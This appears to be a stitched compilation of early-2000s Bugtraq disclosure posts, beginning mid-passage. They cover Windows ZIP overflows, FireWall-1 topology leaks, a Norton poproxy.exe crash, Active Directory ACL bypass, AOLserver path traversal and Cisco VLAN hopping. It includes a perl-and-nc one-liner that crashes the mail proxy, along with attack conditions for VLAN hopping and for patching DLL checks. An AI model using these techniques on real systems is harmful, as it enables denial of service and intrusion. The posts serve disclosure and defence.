  filenames would be hidden from the user.

  Microsoft was notified of this issue, and a fix is available. More
  information can be found in Microsoft Security Advisory MS02-054.
  This issue has been assigned a CVE ID of CAN-2002-0370.

   Microsoft Windows ME
  Windows ME provides functionality to uncompress ZIP files
  on-the-fly, and presents them as folders that users can navigate
  through.  There exists a buffer overflow in this feature
  which may allow malicious ZIP files to be constructed that
  execute code upon access.

  Microsoft was notified of this issue, and a fix is available. More
  information can be found in Microsoft Security Advisory MS02-054.
  This issue has been assigned a CVE ID of CAN-2002-0370.


   Microsoft Windows 98 With Plus! Pack
  Windows 98 provides functionality to uncompress ZIP files
  on-the-fly, and presents them as folders that users can navigate
  through.  There exists a buffer overflow in this feature
  which may allow malicious ZIP files to be constructed that
  execute code upon access.

  Microsoft was notified of this issue, and a fix is available. More
  information can be found in Microsoft Security Advisory MS02-054.
  This issue has been assigned a CVE ID of CAN-2002-0370.

   Lotus Notes Client R4
  Lotus Notes Client R4 crashes when viewing certain zip files
  using the built-in attachment viewer.

  The R4 Lotus Notes client 

Re: Firewall-1 Information leak

[Bugtraq Account]

On Wed, 18 Jul 2001, Haroon Meer wrote:

 Checkpoint Firewall-1 makes use of a piece of software called SecureRemote
 to create encrypted sessions between users and FW-1 modules. Before remote
 users are able to communicate with internal hosts, a network topology of
 the protected network is downloaded to the client. While newer versions of
 the FW-1 software have the ability to restrict these downloads to only
 authenticated sessions, the default setting allows unauthenticated
 requests to be honoured. This gives a potential attacker a wealth of
 information including ip addresses, network masks (and even friendly
 descriptions)

This is a well-known, and generally accepted, risk associated with running
FWZ SecuRemote VPN's to FireWall-1.  As others have already commented, it
is possible to turn off unauthenticated topology downloads through the
policy properties.  If you do this, you will need to manually distribute a
userc.C file (containing the topology information) to all of your
secuRemote users.  This file should be loaded into the
c:\winnt\fw\database directory on the client.

From start to finish, the procedure should go something like this:

1. Set up you firewall gateway for VPN, with the Respond to
unauthenticated topology requests enabled.

2. Set up a sample secuRemote client, and download the site topology.

3. Turn off Respond to unauthenticated topology requests.

4. Securely distribute the file userc.C from the sample client to all
secuRemote users.

You will need to send out an updated userc.C any time there is a change to
the encryption domain or keying info.

Regards,
Dave Taylor

Nortan Antivirus 2000 Poproxy.exe problem

[bugtraq]

Poproxy.exe is the email virus scanner included in Nortan Antivirus 2000 (maybe
other versions too). It listens on port 110 and acts as a mail server,
retreiving your mail then scanning it, and passing it along to the mail client
(i think).

While messing around with this i crashed the server by sending it
too many characters (269 or more). Once the program crashes the
user is unable to receive email until the next reboot (or poproxy.exe is run
again)

Example:
perl -e '{print Ax269}' |nc 10.0.2.1 110

where 10.0.2.1 is the windows machine running poproxy.exe

The output i got was:
POPROXY caused an invalid page fault in module MFC42.DLL at 014f:5f490453.
Registers:
EAX= CS=014f EIP=5f490453 EFLGS=00010246
EBX= SS=0157 ESP=02b1fc00 EBP=02b1fc14
ECX=007c0f28 DS=0157 ESI= FS=381f
EDX= ES=0157 EDI=007c0ef8 GS=1247
Bytes at CS:EIP:
89 7e 04 e8 ac 49 f8 ff 53 56 ff 76 04 e8 a7 48
Stack dump:
   00a136b0  41414141 5f419f09 007c0ef8 00a11f20 
007c0f60 0001 5f419f09 0009 010d 0001 5f419e84


Can anyone else confirm this?

Win2k directory services weakness

[BugTraq]

Hello,

we came across one security issue; which may be critical
for large organizations planning to deploy Windows 2000
and Active Directory in one forest.

Imagine that there is a forest with more than one domain.
(Tree hierarchy does not matter in this situation.) Every
domain has its own set of administrators.

In Active directory there is one Configuration Container
for the whole forest. So every domain controller has its own
copy of Configuration Container and is able to change it and
replicate changes to other domain controllers. The only
obstruction for changing configuration are ACLs.
But ACLs are checked on local system and if you somehow
modify it to avoid this checking, you can modify this Container.

How to do it ? It is just a matter of finding a place where
ACL is checked and patching correspoding DLL to disable this check.

We think the check is done in Directory Service Agent. So
you can patch and replace it or add a patched version to
original one running in the context of LSA - for how to run
own code in the context of LSA, see pwdump2
http://razor.bindview.com/tools/desc/pwdump2_readme.html utility.
What you need in this case is SeDebugPrivilege.

Real issue is: if in this situation one of domain controllers
is hacked, hacker can change links for Site Domain policy, where
are stored paths for logon/logoff and startup/shutdown scripts.
So run own codes on any other domain controller in forest.

If you have large organization, every DC is then (almost) equally
vulnerable; if a hacker beaks into one, he gets all.

Did anyone thought about this issue, and have anyone any
idea how to solve it ?

Thank you.

Michal Zeman, Pavol Mederly
Comenius University, Bratislava, Slovakia

Re: Vulnerability in AOLserver

[bugtraq]

AOLserver v3.2 is a web server available from http://www.aolserver.com.
A vulnerability exists which allows a remote user user to break out of the
web root using relative paths (ie: '...').

 AOLserver v3.2 on Linux (RH 6.0) does not appear to be vulnerable.
 OS-dependent code?

Correct.  Microsoft Windows has an undocumented "feature" where '...\' or
'\' or '..\' point to parent directories.  This feature is obscure
un documented enough that almost every single web server ported to Windows
allows viewing of files above the document root with this feature.  In
fact, Microsoft's own personal web server had this problem at one point.

Linux has had similiar problems with undocumented interfaces.  It was
discovered about a year ago that by using undocumented calls that restrict
privledges, an attacker could set things up a a SUID root application
could not drop its root privledges.

- Sam

Veritas BackupExec (remote DoS)

[oh3mqu+bugtraq]

Hello,

I am using Backup system from Veritas Software (http://www.veritas.com/)
and its Linux agent.  That agent is listening TCP-socket (8192 in my
system) and if someone makes connection to that socket, but do not send
anything to it, the agent hangs forever, even if you close that
connection.  For example portscanners make it to hang.

I think that the problem is that the software is not using select()
function calls before read() calls and it is not using threads either.

I reported that to the Veritas and they replied "Unfortunately our Backup
Exec Desktop Products do not support backing up Linux machines.  I'm
afraid we would be unable to assist you in this instance, however
thank you for your interest."

--
Ari Saastamoinen
[EMAIL PROTECTED]

Re: Microsoft Security Bulletin (MS00-005)

[bugtraq]

Interesting that this is not a part of Windows 98's Windows
Update.  If it was a serious enough vulnerability to fix you would think
that it would also be easy to download and install without subscribing to
any security related lists.  :

_John

On Mon, 17 Jan 2000, Microsoft Product Security wrote:

 The following is a Security  Bulletin from the Microsoft Product Security
 Notification Service.

 Please do not  reply to this message,  as it was sent  from an unattended
 mailbox.
 

 Microsoft Security Bulletin (MS00-005)
 --

 Patch Available for "Malformed RTF Control Word" Vulnerability
 Originally Posted: January 17, 2000

 Summary
 ===
 Microsoft has released a patch that eliminates a security vulnerability in
 the Rich Text Format (RTF) reader that ships as  part of Microsoft(r)
 Windows(r) 95 and 98, and Windows NT(r) 4.0. Under certain conditions, the
 vulnerability could be used  to cause email programs to crash.

 Frequently asked questions regarding this vulnerability can be found at
 http://www.microsoft.com/security/bulletins/MS00-005faq.asp.

{SNIP}

 Affected Software Versions
 ==
  - Microsoft Windows 95
  - Microsoft Windows 98
  - Microsoft Windows 98 Second Edition
  - Microsoft Windows NT 4.0 Workstation
  - Microsoft Windows NT 4.0 Server
  - Microsoft Windows NT 4.0 Server, Enterprise Edition
  - Microsoft Windows NT 4.0 Server, Terminal Server Edition

 NOTE: Windows 2000 is not affected by this vulnerability.

 Patch Availability
 ==
  - Windows 95:
http://www.microsoft.com/windows95/downloads/contents/
WUCritical/rtfcontrol/default.asp
  - Window 98:
http://www.microsoft.com/windows98/downloads/contents/
WUCritical/rtfcontrol/default.asp
  - Windows NT 4.0 Workstation, Windows NT 4.0 Server, and
Windows NT 4.0 Server, Enterprise Edition:
Intel:
   http://www.microsoft.com/Downloads/Release.asp?ReleaseID=17510
Alpha:
   http://www.microsoft.com/Downloads/Release.asp?ReleaseID=17511
  - Windows NT 4.0 Server, Terminal Server Edition:
To be released shortly.
{SNIP}

VLAN Security

[bugtraq]

To Bugtraq,

We have recently conducted some testing into the security of the
implementation of VLANs on a pair of Cisco Catalyst 2900 series
switches and we feel that the results of this testing might be of some
value to the readers.  Testing basically involved  injecting 802.1q
frames with forged VLAN identifiers into the switch in an attempt to
get the frame to jump VLANs.  A brief background is included below for
those that might not be too familiar with VLANs.  Others should skip
to the end for the results.

Background
==
Virtual LAN (VLAN) technology is used to create logically separate
LANs on the same physical switch.  Each port of the switch is assigned
to a VLAN.  In the case of the Cisco Catalyst, VLAN'ing is done at
layer 2 of the OSI network model, which means that a layer 3 device
(router) is required to get traffic between VLANs (possibly a
filtering device).

In addition to the above, VLANs may be extended beyond a single switch
through the use of trunking between the switches.  The trunk allows
VLANs to exist on multiple switches.  To preserve VLAN information
across the trunk, the ethernet frame is 'wrapped' in a trunking
protocol.  Cisco have their own proprietary trunking protocol, but
they also support the emerging 802.1q standard - we used 802.1q
trunking in these tests.

Basically, 802.1q adds a tag to the ethernet frame that specifies the
VLAN that the frame belongs to.  Thus, when it is transported between
switches over the trunk, it is possible for the receiving switch to
send the frame to the correct VLAN.  In Cisco's implementation of
802.1q the tag is
four bytes long and has the format "0x 80 00 0n nn" where nnn is the
VLAN identifier.  The tag is inserted into the ethernet frame
immediately after the source MAC address.  So, an ethernet frame
entering switch 1 on a port that belongs to VLAN 4 has the tag "80 00
00 04" inserted.  The 802.1q frame traverses the switch trunk and the
tag is stripped from the frame before the frame leaves the destination
switch port.

For more information on 802.1q -
http://grouper.ieee.org/groups/802/1/vlan.html

During our tests we used the packet generation tool of Network
Associates' Sniffer Pro v 2 to generate 802.1q frames with modified
VLAN identifiers in an attempt to get frames to hops VLANs without the
intervention of a layer 3 device.

Findings

We found that under specific conditions it was possible to inject
frames into one VLAN and have them 'hop' to a different VLAN.  This is
a serious concern if the VLAN mechanism is being used to maintain a
security gradient between two network segments.  This has been
discussed with Cisco and we believe that it is an issue with the
802.1q specification rather than an implementation issue.

The trunk port, along with all the other ports, must be assigned to a
VLAN.  If some non-trunk ports on the switch share the same VLAN as
the trunk port, then it is possible to inject modified 802.1q frames
into these non-trunk ports, and have the frames hop to other VLANs on
another switch.

eg.
Switch 1 has ports 1-12 on VLAN 1
Switch 1 has ports 13-23 on VLAN 2
Switch 1 has port 24 configured as an 802.1q trunk (VLAN 1)
Switch 2 has ports 1-12 on VLAN 1
Switch 2 has ports 13-23 on VLAN 2
Switch 2 has port 24 configured as an 802.1q trunk (VLAN 1)
Machine 1 is on port 1, switch 1.
Machine 2 is on port 13, switch 2.

We can send 802.1q frames with the following details...
Source MAC = Machine 1
Destination MAC = Machine 2
VLAN ID = VLAN 2
...from machine 1 and they will arrive at machine 2.

This will only occur if the trunk port belongs to the same VLAN as
machine 1.
* We tried this only for the trunk belonging to VLAN 1.  We expect
that similar results would be achieve if machine 1 and the trunk port
shared VLAN 3, 4, ...

Implications

This is a problem if the following conditions are met:
1. The attacker has access to a switch port on the same VLAN as the
   trunk.
2. The target machine is on a different switch.
3. The attacker knows the MAC address of the target machine.

In a real-life scenario, there may also be a requirement for some
layer 3 device to provide a connection from VLAN 2 back to VLAN 1.

Recommendations
===
Try not to use VLANs as a mechanism for enforcing security policy.
They are great for segmenting networks, reducing broadcasts and
collisions and so forth, but not as a security tool.

If you MUST use them in a security context, ensure that the trunking
ports have a unique native VLAN number.

Final Notes
===
Thanks to those at Cisco who assisted in the handling of this issue.
The two switches used for testing were WS-C2924M-XL's.  They were both
running 11.2(8)SA5.
Additional information on test configuration will be made available on
request.

Regards,

Dave Taylor ([EMAIL PROTECTED])
Steve Schupp([EMAIL PROTECTED])